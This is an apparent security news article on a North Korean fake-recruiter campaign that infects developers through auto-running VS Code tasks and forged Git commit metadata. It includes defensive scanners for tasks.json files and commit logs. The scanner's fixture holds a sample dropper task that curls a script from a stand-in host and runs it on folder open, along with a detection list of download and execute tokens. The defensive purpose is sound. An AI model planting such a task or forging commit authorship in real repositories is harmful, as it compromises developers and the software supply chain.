North Korean Hackers Exploit Fake Job Interviews to Infect Developers’ Code Repositories
A North Korean cyber espionage group tracked as Void Dokkaebi (also known as Famous Chollima) has been running a sustained campaign against software developers that uses fake job interviews as the lure. The goal is to compromise developers' workstations and then spread malware further by planting it in the code repositories those developers maintain.
The Deceptive Approach
The attackers make first contact by posing as recruiters from reputable cryptocurrency and artificial intelligence firms on professional networking platforms. They walk the developer through a fabricated interview process that ends in a technical assessment: the candidate is asked to clone a repository the "recruiter" supplies and run the code in it. The repository carries malicious code that fires the moment the developer executes it.
Mechanisms of Infection
Once the developer runs the code, the malware gains a foothold on the workstation. Void Dokkaebi relies on two main techniques to keep that access and to spread from it:
1. Abuse of Visual Studio Code task configuration: The attackers plant a `.vscode/tasks.json` file in the project. This is a legitimate editor feature, not a vulnerability: a task whose `runOptions` set `runOn` to `folderOpen` is started by Visual Studio Code automatically whenever the folder is opened, but only in a trusted workspace. The workspace trust prompt shown on first open is therefore the only gate; once the developer clicks through it, the task runs and either fetches a backdoor from a remote server or launches a payload already hidden in the repository.
2. Direct code injection: With remote access in hand, the attackers add obfuscated JavaScript to source files in the repositories on the compromised machine, placed so that it survives a cursory review. A batch script, `temp_auto_push.bat`, then rewrites the Git commit history so that the malicious change is attributed to the repository's own contributors and looks like ordinary work. This works because Git author and committer names, e-mail addresses and dates are unauthenticated metadata that anyone with push access can set freely; only a commit signature ties a change to a verified identity.
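The following scanner, added here as an illustration and not code from the article or from Trend Micro, looks for the pattern described in item 1: a task in `.vscode/tasks.json` that auto-runs on folder open and whose command downloads or executes something. It also gives a concrete form to the "review repository configurations" advice later on. The suspicious-token list, the two sample `tasks.json` files and the severity labels are assumptions made for this example, not published indicators.

```python
"""Scan a cloned repository for VS Code tasks that run on folder open.

Added example, not code from the article or from Trend Micro. The token
list, sample files and severity labels are assumptions made here.
"""
from __future__ import annotations

import json
import os
import re
from typing import Any

# Tokens that rarely appear in a legitimate build or test task but are typical
# of a dropper. Heuristic list chosen for this example, not an IOC set.
SUSPICIOUS = (
    "curl", "wget", "invoke-webrequest", "iwr ", "downloadstring",
    "powershell", "-enc", "base64", "node -e", "eval(", "bash -c",
    "http://", "https://", "/tmp/", "%temp%", "chmod +x",
)


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments and trailing commas while respecting string
    literals. VS Code parses tasks.json as JSON-with-comments; a naive regex
    would also eat the "//" inside a URL such as https://host."""
    out: list[str] = []
    i, n, in_str = 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))  # trailing commas


def load_jsonc(text: str) -> Any:
    return json.loads(strip_jsonc(text))


def _command_text(task: dict[str, Any]) -> str:
    """Join command and args, including per-OS overrides (windows/linux/osx),
    which may carry a different command than the generic one."""
    parts: list[str] = []
    for section in (task, *(task.get(k) or {} for k in ("windows", "linux", "osx"))):
        if "command" in section:
            parts.append(str(section["command"]))
        for a in section.get("args") or []:
            # args may be plain strings or {"value": ..., "quoting": ...} objects
            parts.append(a if isinstance(a, str) else str(a.get("value", a)))
    return " ".join(parts)


def scan_tasks_json(text: str) -> list[dict[str, Any]]:
    """One finding per task that auto-runs on folder open or looks like a dropper."""
    findings = []
    for task in load_jsonc(text).get("tasks") or []:
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        hidden = (task.get("presentation") or {}).get("reveal") == "never"
        cmd = _command_text(task)
        hits = [t for t in SUSPICIOUS if t in cmd.lower()]
        if not (auto_run or hits):
            continue
        findings.append({
            "label": task.get("label", "<unlabeled>"),
            "auto_run": auto_run,
            "hidden_terminal": hidden,
            "command": cmd,
            "indicators": hits,
            # auto-start plus a download/eval command or a hidden terminal is the
            # campaign's shape; either signal alone still deserves a look.
            "severity": "high" if auto_run and (hits or hidden) else "medium",
        })
    return findings


def scan_repo(root: str) -> dict[str, list[dict[str, Any]]]:
    """Walk a checkout and scan every .vscode/tasks.json (nested folders can each carry one)."""
    results: dict[str, list[dict[str, Any]]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in filenames:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, encoding="utf-8") as fh:
                try:
                    found = scan_tasks_json(fh.read())
                except ValueError as exc:  # unparseable config is itself worth a look
                    found = [{"label": "<unparseable>", "auto_run": None, "hidden_terminal": None,
                              "command": "", "indicators": [f"parse error: {exc}"], "severity": "medium"}]
            if found:
                results[path] = found
    return results


# Constructed samples in the shape the article describes (not real IOCs).
SAMPLE_MALICIOUS = r'''{
  // helper tasks for the take-home assignment
  "version": "2.0.0",
  "tasks": [
    { "label": "npm: install", "type": "shell", "command": "npm install", "problemMatcher": [], },
    {
      "label": "prepare env",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.js -o /tmp/.s.js && node /tmp/.s.js",
      "windows": { "command": "powershell -w hidden -enc QQBB" },
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}'''
SAMPLE_BENIGN = '{"version": "2.0.0", "tasks": [{"label": "test", "type": "shell", "command": "npm test"}]}'

if __name__ == "__main__":
    for f in scan_tasks_json(SAMPLE_MALICIOUS):
        print(f"[{f['severity']}] {f['label']!r} auto_run={f['auto_run']} "
              f"hidden={f['hidden_terminal']} indicators={f['indicators']}")
    print("benign:", scan_tasks_json(SAMPLE_BENIGN))
```

Run `scan_repo(path)` on a clone before opening it in the editor; a task that combines `folderOpen`, a hidden terminal and a download-and-execute command is exactly the shape this campaign uses. Keeping the folder in Restricted Mode until the scan is clean prevents the task from running at all.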
Escalation and Propagation
By March 2026 the campaign had grown considerably. Trend Micro Research identified more than 750 infected repositories, over 500 malicious Visual Studio Code task configurations and 101 copies of commit-tampering tooling on public code hosting platforms. Repositories belonging to organizations such as DataStax and Neutralinojs were among those compromised, showing that the campaign had reached prominent open-source projects.
The payload is a variant of the DEVSPOPPER remote access trojan, a cross-platform tool written for Node.js. It talks to its command-and-control server over WebSocket and exfiltrates files over HTTP. The trojan checks for continuous integration/continuous deployment (CI/CD) environments and cloud sandboxes and refuses to run in them, so it executes only on real developer workstations and stays out of automated analysis.
Preventive Measures
To reduce the risk from attacks of this kind, developers and organizations should:
– Isolate untrusted code: Run code from unknown or unverified sources, including interview take-home assignments, in a disposable virtual machine or container that has no access to the host's credentials, SSH keys, tokens or other repositories.
– Review repository configurations before opening: Inspect a freshly cloned project for files such as `.vscode/tasks.json`, looking for tasks with `runOn` set to `folderOpen` and for commands that download or evaluate code. Keep untrusted folders in Restricted Mode when Visual Studio Code asks about workspace trust, and consider setting `task.allowAutomaticTasks` to `off`.
– Monitor for unauthorized changes: Use tooling that alerts on unexpected modifications to repositories, including obfuscated or hidden code, unsigned commits, and commits whose author or timestamps do not fit the surrounding history; require signed commits on protected branches where possible.
– Educate and train developers: Run regular awareness sessions on social engineering tactics and on verifying recruitment approaches through a channel the "recruiter" does not control.
None of these measures is exotic. Together they remove the steps this campaign depends on: running untrusted code on a real workstation, trusting a workspace blindly, and accepting commit metadata at face value.
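As an added example of the monitoring advice above, and of why the commit tampering in item 2 works, the following script parses machine-readable `git log` output and flags commits whose metadata looks rewritten: author and committer identities that differ, author dates far earlier than the commit date, and commits that claim a maintainer's address without a valid signature. It is not code from the article or from Trend Micro; the log lines, the trusted-address set and the seven-day threshold are constructed for this example, and every flag is a heuristic that legitimate rebases and squash merges can also trigger.

```python
"""Flag commits whose Git metadata looks rewritten or spoofed.

Added example, not code from the article or from Trend Micro. Git's author
name/email and both timestamps are plain text that anyone with push access
can set (GIT_AUTHOR_DATE, --author, --amend, rebase); only a signature
(%G? == "G") ties a commit to a verified identity. Thresholds, reason
labels and the sample log are assumptions made for this example.
"""
from __future__ import annotations

import subprocess
from dataclasses import dataclass

SEP = "\x1f"  # %x1f in the git format string: unlikely to appear in a subject
LOG_FORMAT = SEP.join(["%H", "%an", "%ae", "%at", "%cn", "%ce", "%ct", "%G?", "%s"])
BACKDATE_SLACK = 7 * 24 * 3600  # author date more than a week before the commit date


@dataclass
class Commit:
    sha: str
    author_name: str
    author_email: str
    author_ts: int
    committer_name: str
    committer_email: str
    committer_ts: int
    sig: str       # %G? status: G good, N none, B bad, U untrusted key, ...
    subject: str


def run_git_log(repo: str, rev_range: str = "HEAD") -> str:
    """Real use: capture `git log` for a checkout in the machine-readable format."""
    return subprocess.run(
        ["git", "-C", repo, "log", f"--format={LOG_FORMAT}", rev_range],
        check=True, capture_output=True, text=True).stdout


def parse_git_log(text: str) -> list[Commit]:
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(SEP)
        if len(f) != 9:
            raise ValueError(f"unexpected field count {len(f)} in line: {line!r}")
        commits.append(Commit(f[0], f[1], f[2], int(f[3]), f[4], f[5], int(f[6]), f[7], f[8]))
    return commits


def flag_commit(c: Commit, trusted_emails: set[str]) -> list[str]:
    """Heuristics only: rebases and squash merges legitimately produce the first two."""
    reasons = []
    if (c.author_name, c.author_email) != (c.committer_name, c.committer_email):
        reasons.append("author/committer identity mismatch")
    if c.committer_ts - c.author_ts > BACKDATE_SLACK:
        reasons.append("author date backdated relative to commit date")
    if c.sig != "G":
        if c.author_email in trusted_emails:
            # The dangerous case: a maintainer's address typed into an unsigned commit.
            reasons.append("claims maintainer identity but is not validly signed")
        else:
            reasons.append(f"not validly signed (%G? = {c.sig})")
    return reasons


def audit(text: str, trusted_emails: set[str]) -> dict[str, list[str]]:
    """Map sha -> reasons for every commit that trips at least one heuristic."""
    return {c.sha: r for c in parse_git_log(text) if (r := flag_commit(c, trusted_emails))}


# Constructed sample log (three commits), not taken from any real repository.
SAMPLE_LOG = "\n".join([
    SEP.join(["1" * 40, "Jane Maintainer", "jane@example.org", "1772000000",
              "Jane Maintainer", "jane@example.org", "1772000000", "G", "Fix Windows build"]),
    # Injected change: maintainer's name pasted in, backdated by years, unsigned.
    SEP.join(["2" * 40, "Jane Maintainer", "jane@example.org", "1700000000",
              "dev", "dev@localhost", "1772100000", "N", "Update utils"]),
    SEP.join(["3" * 40, "Sam Contributor", "sam@example.net", "1772050000",
              "Sam Contributor", "sam@example.net", "1772050000", "N", "Add test"]),
])
TRUSTED = {"jane@example.org"}

if __name__ == "__main__":
    for sha, reasons in audit(SAMPLE_LOG, TRUSTED).items():
        print(sha[:12], "; ".join(reasons))
```

For a real repository, feed `run_git_log(path, "origin/main..HEAD")` into `audit` and keep the trusted-address set in sync with the people who actually hold commit-signing keys; a commit that carries one of those addresses without a good signature is the one to open first.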